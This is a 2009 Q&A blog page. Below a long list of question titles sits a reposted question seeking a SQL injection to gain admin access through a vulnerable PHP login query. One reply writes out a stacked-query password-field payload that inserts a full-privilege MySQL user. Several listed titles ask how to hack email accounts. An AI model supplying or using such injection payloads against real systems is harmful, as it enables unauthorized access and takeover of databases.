Pages

Archives

I Have A Great Business Idea?I Want To Send Picture Messages To My Friend In Portugal(i Live In The Uk) But They Fail?How Do I Fix My Mod On Halo Trial?What Is The Twitter Iphone Application That Can Save Twits And Send Later When I Connect To Internet?How Can I Download Software That Can Copy My Ps2 Games And Play Them On My Ps2 Without A Mod Chip?How Do I Create Hardware Profiles For Different Printers?Do I Have To Worry About Any Sql Injections Or Attacks If I Don't Use Insert In Any Codes On The Page?How Is The Root Partition Identified In Linux?How To Write Onto A Disc, The Upgraded Antivirus, Which Is Installed Prior To Upgrade.?What Can I Use To Hack Into A Hotmail Account Just Using The Email Address?Is It Possible For Someone To Hack Into My Computer From Another State? Or Hack Into My Yahoo Im?My Dogs Hacking And Doing A Throwing Up Motion?Who Else Besides Vodafone?How Can I Get Rid Of My Operator Logo On My Mobile?Where Do I Paste The Mod File To The Halo Pc Trial?What Will Be The Difference Between The Iphone And Iphone 3g?How Can I Become A Runescape Player Mod?What Are Some Of The Common Causes Of Ps3 Hardware Failure Particularly The Blue Ray Player?Sql Security Or Form Input Filtering?Ubuntu Linux. How Do I Login As Root?How Do You Step By Step Rmove A Computer Virus With Avast Antivirus?Can My Co-workers Hack Into My Work Email?Is It Illegal To Hack Into A Yahoo Account And What Can You Do If It Happens To You?Is Hacking School Computers To Go On Yahoo Im Illegal?Vodafone Internet Charges?Vodafone! What Are The Real Player Settings?Where Can I Download Wii Games For Free Without The Mod Chip?How Much Is An Iphone In The Philippines?What Version Of The Total War: Rome Series Is Required To Play The Middle Earth: Total War Mod?What Are The Types Of Work Or Jobs Available In Uae Countries For A Basic Computer Hardware Technician?Mysql Injection In Latest Version Of Mysql And Php?How Can I Fix The Desktop Of My Linux Machine In A User Mode Other Than Root?What Is The Best Free Antivirus Availabe That's Downloadable From The Internet?How Was Someone Able To Hack Into My Email Accounts?Who Is More Of A Liberal Hack, Yahoo! News Or The Huffington Post?What Are The Prison Terms For Computer Hacking?Can I Access Dial Up Email Via Gprs On Vodafone?Which Wireless Internet Service Is Fast And Best In India?Will Updating Your Wii For A Game Make A Mod Chip Inoperable?How Do I Add Applications To My Iphone From The Itunes Library?What Can U Do To Apply Mod To Gta San Adreas Without It Freezing?What Hardware / Software Would One Require For Modern Day Editing In Filmmaking?When To Use Stored Procedures Vs Embedding Sql Statements?How To Add User Permissions To A User In Linux Suse From Root?What Is The Best Freeware Antivirus Program?Need To Hack Into Scam Artists Email, Please Help?Is It Possible To Hack Passwords Of Yahoo And Msn Email Id?How Can I Locate Who Is Hacking Into My Match Profile?Music In Vodafone Ad????What Mobile Network Has The Best Coverage?How To Detach Mod Chip Out Of My Slim Ps2?What Are The Disadvantages Of Using The Iphone W T Mobile?What Hardware To Ship To Comply With Ebay And Microsoft Oem Software Policy?Sql Injections Anyone?Plz How Cn I Change Root Password In Linux Os??How Do I Remove Internet Antivirus Pro From My Dell Laptop?Do U Get Arrested And Go To Jail If U Hack Into Someones Myspace Or Email?How People Can Hack My Yahoo Id And Password?How Can You Catch Someone Hacking Into Your Email?Vodafone Mobile Phone Help?New Vodafone Advert?What Are All The Possible Values Of 2^r (mod⁡ 7), Where R Is A Nonnegative Integer?How Much Is The Iphone 3g Plan Monthly On The Family Plan?Are There Any Mod Chips Out There That Allow Backwards Compatibility?What Color Cabinet Hardware Would Look Good With These Cabinet Colors?Sql Injections (trainining)How Do You Take Dial Up Internet In Ubuntu Linux?What Is The Best Free Antivirus, Free Antispyware And Free Firewall?How Do Ppl Hack Yahoo E-mail?How Can I Report Someone Who Is Hacking My Aol Email?Vodafone Usb Modem - Cannot Install Hardware..help!!!?Vodafone Upgrade Pack, Can't Send Texts?Can You Apply For The Mod Police And A Constabulary At The Same Time?Is There A Free Iphone Service That Has Actually Been Confirmed?Can You Mod A Sportstronic System/ Or Something Like That With Paddle Shifters In Steering Wheel?How To Recieve Hardware From Computer Manufacturers To Review?Sql Injections...?You Have Root Access To A Linux Server. How Do You Tell It Is Running Selinux ?How Do I Get System Antivirus 2008 To Stop Popping Up On My Computer?How Can People Hack Your Email List?Is There A Hack To Get The Yahoo Avatar Props From The Opposite Gender?What Should I Do For Learning About Hacking ?Im Getting Courtesy Messages About Premium Sms Spend-i Have No Idea What This Is!!!??Can Anyone Tell Me Number Series 94162 Belongs To Which Mobile Service?How To Mod An Xbox 360 With Soldering The Chip?How Much Is The Iphone With Internet And Unlimited Text Messaging?What Is The Best Sims 2 Censor Removal Mod?How To Bypass Quotesafing Which Uses Escape Characters, Such As A Backslash In Sql Injection?What Is The Default Id Of Root In Red Hat Linux? ?What Is The Best Antivirus / Firewall For Servers?How Do You Keep People From Being Able To Hack Your Password To Your Email?Can You Hack Yahoo Id's ??How Can You Prove That You Were Not On Your Mobile Whilst Driving?My Vodafone 3g Usb Broadband Modem Will Not Work With Ms Vista. Any Ideas??What Mod Chip Should I Get For My Xbox 360 If I Just Want To Play Copied Games With?What Is The Difference Bettween The Old Iphone And The Iphone 3g?What Hardware And Software Can Do This Job With Only One Pc And 20-30 Wy-fi Headsets?How Do I Prevent Sql Injection Attacks With Php And Mysql?Suse Linux 10.1: Need To Reset Root Password.?Is There Any Good Antivirus Software That Does Not Cost Money?I Forgot My Email Password And Also Lost The Referal Email Account Which Was Hacked.what Do I Do Please?Someone Hack My Yahoo Email And Change My Information?Whats A Good Linux Os For Hacking And Was The Best Laptop Hardware For Hacking Are Macs Good?How Long Does It Take For A Company To Carry Out A Credit Check?How Can You Send Cheap Text Messages To Ireland From The Uk?How To Create A Mod For Frets On Fire?The Iphone Is Goign To Be A Truly Remarkable Device! How Much Do You Know About It?What Is The Best Mod Chip For My Wii?What's The Difference Between Software And Hardware?Sql Injection, How To Replace/escape '?Root Permission In Linux?What Is The Best Antivirus Software Program?Has Anyone Tried Paying Someone To Hack Into An Email Address?did It Work?I Need To Hack Into My Own Yahoo Account - A Different One From This One Obviously?When I Started A Contract With Vodafone I Had To Pay 2 Months On The First Month. Now I Have Cancelled ?Problem With Text Messages On Vodafone Uk?How Can I Incorporate Mod Style Into My Everyday Look?How Can I Use Itunes On My Iphone 3g With Turbo Sim And Is Jailbroken?How Do I Play Japanese Ps1 Games On An American Ps2 Without A Mod Chip?Where Can I Go To Compare The Hardware In My Computer To What Is Necessarily Decent?Sql Injection - Hacking?The File Which Is Not Deleted By Root?What Is The Best Antivirus Software To Use When You're Always Online?Can Someone Hack Into Your Myspace With Just Your Email?What Are The Legal Options For Dealing With Someone Hacking Into Your Emails Or Ims?Unlock Vodafone N95?How Do I Find Out How Much Credit/texts I Have Left On Orange?How Come When I Play Garrys Mod It Wont Let Me Us The Adv Dupe In Single Player?How Do You Unsync An Iphone From A Computer?How Can You Mod An Xbox 360 Without Voiding The Warranty???

Pages

 

June 2009
M T W T F S S
« May    
1234567
891011121314
15161718192021
22232425262728
2930  

Recent Comments

Google Analysis


0
Unique
Visitors
Powered By
29 May

Can Anyone Think Of A Sql Injection For These Conditions…?

Author: admin  //  Category: SQl Injection

can anyone tell me what i can put in the input fields to get administration options… an sql injection … with these terms… of action…
========== its php and $username and $password are the inputs…
if ($username && $password){
$query = sprintf(”SELECT * FROM login WHERE username = ‘$username’ and password = ‘$password’”);
$result = mysql_query($query);
$account = mysql_fetch_array($result);
}
if ($account){
$_SESSION['id'] = $account['id'];
header(”location:admin.php”);
exit;} else { echo ” u are no admin…. “;}
=======

Tags: , , , ,

2 Responses to “Can Anyone Think Of A Sql Injection For These Conditions…?”

  1. Wiseguy Says:
    May 29th, 2009 at 7:33 am

    Do you mean admin permissions for the database or the application? It sounds like you mean the application, in which case you haven’t provided enough information. You’d need to know how admins are specified in the database.
    If you do mean the database, however, something like this might do the job:
    $username = “whatever”;
    $password = “password’; INSERT INTO `user` ( `Host` , `User` , `Password` , `Select_priv` , `Insert_priv` , `Update_priv` , `Delete_priv` , `Create_priv` , `Drop_priv` , `Reload_priv` , `Shutdown_priv` , `Process_priv` , `File_priv` , `Grant_priv` , `References_priv` , `Index_priv` , `Alter_priv` , `Show_db_priv` , `Super_priv` , `Create_tmp_table_priv` , `Lock_tables_priv` , `Execute_priv` , `Repl_slave_priv` , `Repl_client_priv` , `ssl_type` , `ssl_cipher` , `x509_issuer` , `x509_subject` , `max_questions` , `max_updates` , `max_connections` )
    VALUES (
    ‘localhost’, ‘me’, ‘mypass’, ‘Y’, ‘Y’, ‘Y’, ‘Y’, ‘Y’, ‘Y’, ‘Y’, ‘Y’, ‘Y’, ‘Y’, ‘Y’, ‘Y’, ‘Y’, ‘Y’, ‘Y’, ‘Y’, ‘Y’, ‘Y’, ‘Y’, ‘Y’, ‘Y’, ”, ”, ”, ”, ‘0′, ‘0′, ‘0′
    );”;
    For that to work, you’d have to assume the site admin is dumb enough to run general queries using a DB user with sufficient privileges to run that query (like root).

  2. Agent Feyd Says:
    May 29th, 2009 at 11:51 am

    The following source link should be of interest.
    Also, standards dictate that we provide full URL (http:// and all) for header() based redirections.

Leave a Reply